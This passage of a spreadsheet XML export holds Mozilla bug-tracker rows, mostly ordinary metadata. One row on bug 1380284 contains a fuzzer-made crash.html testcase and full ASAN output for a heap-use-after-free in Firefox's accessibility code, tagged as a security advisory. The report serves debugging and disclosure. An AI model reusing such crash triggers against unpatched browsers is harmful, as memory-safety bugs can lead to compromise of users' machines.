      <c r="R1052" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1052" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T1052" t="n">
        <v>1</v>
      </c>
      <c r="U1052" t="n">
        <v>0</v>
      </c>
      <c r="V1052" t="n">
        <v>31</v>
      </c>
      <c r="W1052" t="inlineStr">
        <is>
          <t>Created attachment 709731
Testcase for shell
The attached testcase asserts on mozilla-central revision 847e28c7ba67 (run with --ion-eager).</t>
        </is>
      </c>
      <c r="X1052" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" t="n">
        <v>674300</v>
      </c>
      <c r="B1053" t="inlineStr">
        <is>
          <t>2011-07-26 11:41:34 -0700</t>
        </is>
      </c>
      <c r="C1053" t="inlineStr">
        <is>
          <t>Can't access localized versions of newsletter page</t>
        </is>
      </c>
      <c r="D1053" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1053" t="n">
        <v>1</v>
      </c>
      <c r="F1053" t="n">
        <v>1</v>
      </c>
      <c r="G1053" t="n">
        <v>5</v>
      </c>
      <c r="H1053" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1053" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1053" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1053" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1053" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1053" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1053" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1053" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1053" t="inlineStr"/>
      <c r="Q1053" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1053" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1053" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="T1053" t="n">
        <v>1</v>
      </c>
      <c r="U1053" t="n">
        <v>0</v>
      </c>
      <c r="V1053" t="n">
        <v>7</v>
      </c>
      <c r="W1053" t="inlineStr">
        <is>
          <t>Hi James - 
I was trying to test the German, French and Portuguese newsletter pages.  When I try to type in the non-EN newsletter addresses, it defaults back to EN.  It only happens with the newsletter pages.  Any idea what might have caused this?  As is, I can't test anything to see if it's working properly.</t>
        </is>
      </c>
      <c r="X1053" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" t="n">
        <v>1380284</v>
      </c>
      <c r="B1054" t="inlineStr">
        <is>
          <t>2017-07-12 04:04:39 -0700</t>
        </is>
      </c>
      <c r="C1054" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded</t>
        </is>
      </c>
      <c r="D1054" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:19 -0700</t>
        </is>
      </c>
      <c r="E1054" t="n">
        <v>1</v>
      </c>
      <c r="F1054" t="n">
        <v>1</v>
      </c>
      <c r="G1054" t="n">
        <v>3</v>
      </c>
      <c r="H1054" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1054" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1054" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1054" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1054" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1054" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1054" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1054" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1054" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q1054" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1054" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1054" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T1054" t="n">
        <v>1</v>
      </c>
      <c r="U1054" t="n">
        <v>0</v>
      </c>
      <c r="V1054" t="n">
        <v>14</v>
      </c>
      <c r="W1054" t="inlineStr">
        <is>
          <t>Created attachment 8885662
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170711160010).
&lt;script&gt;
function start() {
	fuzzPriv.enableAccessibility();
	o1=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o2=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o4=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o5=window.document;
	o6=document.documentElement;
	document.documentElement.parentNode.removeChild(o6);
	o1.appendChild(o2);
	o22=window.getSelection();
	o38=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o2.appendChild(o38);
	try{o5.designMode='on';}catch(e){}
	o4.style.position='absolute';
	o5.write('&lt;html&gt;&lt;body&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;');
	o4.prepend(o1,undefined);
	o106=document.createElementNS('http://www.w3.org/1999/xhtml','tr');
	window.top.document.documentElement.appendChild(o4);
	o22.selectAllChildren(o38);
	window.top.document.documentElement.appendChild(o106);
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
	location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==16173==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00005917c at pc 0x7f323e0d3825 bp 0x7fff23077f90 sp 0x7fff23077f88
READ of size 4 at 0x60d00005917c thread T0 (Web Content)
    #0 0x7f323e0d3824 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12
    #1 0x7f323e0d3824 in HasID /home/worker/workspace/build/src/dom/base/nsINode.h:1601
    #2 0x7f323e0d3824 in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded(nsIContent*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2043
    #3 0x7f323e069e30 in mozilla::a11y::TreeWalker::AccessibleFor(nsIContent*, unsigned int, bool*) /home/worker/workspace/build/src/accessible/base/TreeWalker.cpp:321:15
    #4 0x7f323e06a317 in mozilla::a11y::TreeWalker::Next() /home/worker/workspace/build/src/accessible/base/TreeWalker.cpp:175:27
    #5 0x7f323e0dcd07 in mozilla::a11y::DocAccessible::CacheChildrenInSubtree(mozilla::a11y::Accessible*, mozilla::a11y::Accessible**) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2293:39
    #6 0x7f323e0dc1cf in mozilla::a11y::DocAccessible::DoInitialUpdate() /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:1516:3
    #7 0x7f323e04aa76 in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:627:16
    #8 0x7f323ae61f77 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1854:12
    #9 0x7f323ae71855 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:298:7
    #10 0x7f323ae71524 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:320:5
    #11 0x7f323ae73bbb in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:761:5
    #12 0x7f323ae73bbb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:674
    #13 0x7f323ae737c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:575:9
    #14 0x7f323b6a53e2 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #15 0x7f32355123c1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #16 0x7f32350e3f2f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1608:28
    #17 0x7f323503018e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2093:25
    #18 0x7f323502d2d4 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:17
    #19 0x7f323502ebb4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1888:5
    #20 0x7f323502f198 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1921:15
    #21 0x7f323421f875 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1437:14
    #22 0x7f3234225aa8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #23 0x7f3235037e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #24 0x7f3234f940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #25 0x7f3234f940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #26 0x7f3234f940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #27 0x7f323a7c237f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #28 0x7f323ea50817 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #29 0x7f3234f940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #30 0x7f3234f940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #31 0x7f3234f940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #32 0x7f323ea5027d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #33 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #34 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #35 0x7f325165e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #36 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)
0x60d00005917c is located 28 bytes inside of 136-byte region [0x60d000059160,0x60d0000591e8)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f32340bbc47 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25
    #2 0x7f32340c2e0b in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2849:3
    #3 0x7f32340c2e0b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3851
    #4 0x7f32340c2323 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3672:9
    #5 0x7f32340c6100 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4209:21
    #6 0x7f3236f9337d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1676:3
    #7 0x7f3236ae145b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1409:3
    #8 0x7f323423ee21 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7f3235b22fe0 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7f3235b22fe0 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7f3235b22fe0 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7f3235b2a05f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:967:12
    #13 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #15 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #16 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #17 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #18 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #19 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #20 0x7f323f894243 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
    #21 0x7f3235a44a1b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #24 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #25 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #26 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #27 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #28 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #29 0x7f323f8960cb in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #30 0x7f323837d2b5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7f3238d342b5 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7f3238d342b5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7f3238cfc219 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1141:51
    #34 0x7f3238cfe2a4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
    #35 0x7f3238cddfa1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #36 0x7f3238ce1472 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
    #37 0x7f323afc4e6f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f3239075493 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f3239075493 in NS_NewHTMLSpanElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLSpanElement.cpp:15
    #4 0x7f32390fda92 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:287:41
    #5 0x7f32390fda92 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:258
    #6 0x7f3236fc48c3 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:183:12
    #7 0x7f3236eb23bb in nsDocument::CreateElem(nsAString const&amp;, nsIAtom*, int, nsAString const*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8463:17
    #8 0x7f323a8e6531 in mozilla::EditorBase::CreateHTMLContent(nsIAtom*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:4720:15
    #9 0x7f323a945bb8 in mozilla::HTMLEditor::CreateAnonymousElement(nsIAtom*, nsIDOMNode*, nsAString const&amp;, bool) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:191:32
    #10 0x7f323aa25f1c in CreateResizingInfo /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:210:5
    #11 0x7f323aa25f1c in mozilla::HTMLEditor::ShowResizersInner(nsIDOMElement*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:350
    #12 0x7f323a9480ee in ShowResizers /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:283:17
    #13 0x7f323a9480ee in mozilla::HTMLEditor::CheckSelectionStateForAnonymousButtons(nsISelection*) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:455
    #14 0x7f323aa2185f in mozilla::ResizerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:93:19
    #15 0x7f3236d40356 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/dom/base/Selection.cpp:3764:15
    #16 0x7f323b1ddfc0 in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2069:23
    #17 0x7f323b1ddfc0 in nsFrameSelection::EndBatchChanges(short) /home/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2057
    #18 0x7f3236d40b56 in mozilla::dom::Selection::EndBatchChangesInternal(short) /home/worker/workspace/build/src/dom/base/Selection.cpp:3792:21
    #19 0x7f3236d3bf1b in ~SelectionBatcher /home/worker/workspace/build/src/dom/base/Selection.h:484:19
    #20 0x7f3236d3bf1b in mozilla::dom::Selection::SelectAllChildren(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/Selection.cpp:3186
    #21 0x7f3236d3c074 in mozilla::dom::Selection::SelectAllChildrenJS(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/Selection.cpp:3169:3
    #22 0x7f3237b86365 in mozilla::dom::SelectionBinding::selectAllChildren(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Selection*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:719:9
    #23 0x7f32389358a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3060:13
    #24 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #25 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #26 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #27 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #28 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #29 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #30 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f323f8960cb in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #32 0x7f323837d2b5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f3238d342b5 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f3238d342b5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f3238cfc219 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1141:51
    #36 0x7f3238cfe2a4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
    #37 0x7f3238cddfa1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #38 0x7f3238ce1472 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c1a800031d0: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fd fd
  0x0c1a800031e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1a800031f0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80003200: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80003210: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c1a80003220: 00 00 00 00 fa fa fa fa fa fa fa fa fd fd fd[fd]
  0x0c1a80003230: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a80003240: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1a80003250: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c1a80003260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80003270: fd fa fa fa fa fa fa fa fa fa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6173==ABORTING</t>
        </is>
      </c>
      <c r="X1054" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" t="n">
        <v>697255</v>
      </c>
      <c r="B1055" t="inlineStr">
        <is>
          <t>2011-10-25 14:13:06 -0700</t>
        </is>
      </c>
      <c r="C1055" t="inlineStr">
        <is>
          <t>TM/JM: Crash [@ js_GetProperty] or [@ js::analyze::ScriptAnalysis::maybeCode] or "Assertion failure: offset &lt; script-&gt;length," or "Assertion failure: script-&gt;code &lt;= pc &amp;&amp; pc &lt; endpc,"</t>
        </is>
      </c>
      <c r="D1055" t="inlineStr">
        <is>
          <t>2013-01-19 13:56:48 -0800</t>
        </is>
      </c>
      <c r="E1055" t="n">
        <v>1</v>
      </c>
      <c r="F1055" t="n">
        <v>1</v>
      </c>
      <c r="G1055" t="n">
        <v>3</v>
      </c>
      <c r="H1055" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1055" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1055" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1055" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1055" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1055" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1055" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1055" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1055" t="inlineStr">
        <is>
          <t>[sg:critical][qa-] js-triage-done</t>
        </is>
      </c>
      <c r="Q1055" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1055" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1055" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T1055" t="n">
        <v>1</v>
      </c>
      <c r="U1055" t="n">
        <v>0</v>
      </c>
